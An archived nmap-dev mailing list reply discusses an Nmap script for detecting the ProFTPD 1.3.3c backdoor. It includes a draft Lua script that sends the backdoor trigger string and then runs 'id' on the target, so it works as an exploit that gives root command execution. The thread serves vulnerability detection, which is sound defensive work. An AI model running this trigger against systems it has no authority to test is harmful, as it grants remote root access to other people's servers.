Nmap Development mailing list archives
Re: [NSE] Detection of ProFTPD backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Tue, 7 Dec 2010 15:22:49 +0100
Hello, *** Mak Kolybabi <mak () kolybabi com> wrote:
I've attached a script to detect the ProFTPD backdoor. I submit it here for (hopefully) inclusion into Nmap. I have tested it both on a backdoored, and a non-backdoored version of ProFTPD 1.3.3c. Comments, concerns, criticism, and testing are appreciated.
Doesn't work for me. See "http://pastebin.com/us4RebQP". I played around a little and got the following working. It is _not_ a finished script, just an example. ############################################### require "shortport" portrule = shortport.port_or_service(21, "ftp") local CMD_FTP = "HELP ACIDBITCHEZ" local CMD_SHELL = "id" action = function(host, port) local socket = nmap.new_socket() local result local status = true local err_catch = function() socket:close() end local try = nmap.new_try(err_catch) socket:set_timeout(10000) try(socket:connect(host, port)) status, result = socket:receive_lines(1); if not result:match("ProFTPD 1.3.3c") then stdnse.print_debug(1, "This version is not known to be backdoored.") return end try(socket:send(CMD_FTP .. "\r\n")) status, result = socket:receive_lines(1); stdnse.print_debug(1, "Answer (help) is %s",result) -- Vulnerable = TIMEOUT, Not Vulnerable = 502 Unknown command 'ACIDBITCHEZ' try(socket:send(CMD_SHELL .. ";\r\n")) status, result = socket:receive_lines(1); stdnse.print_debug(1, "Answer (id;) is %s",result) -- Vulnerable = uid=0(root) gid=0(root)..., Not Vulnerable = 500 ID; not understood results = { "This installation has been backdoored.", "Command: " .. CMD_SHELL, "Results: " .. result } return stdnse.format_output(true, results) end ############################################### See "http://pastebin.com/QsBRNrdp". Handle with care, i have no experience in writing NSE-Scripts. ;) Micha -- Michael Meyer OpenPGP Key: 52A6EFA6 http://www.greenbone.net/ Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460 Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 10)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 11)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 12)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 13)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 29)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)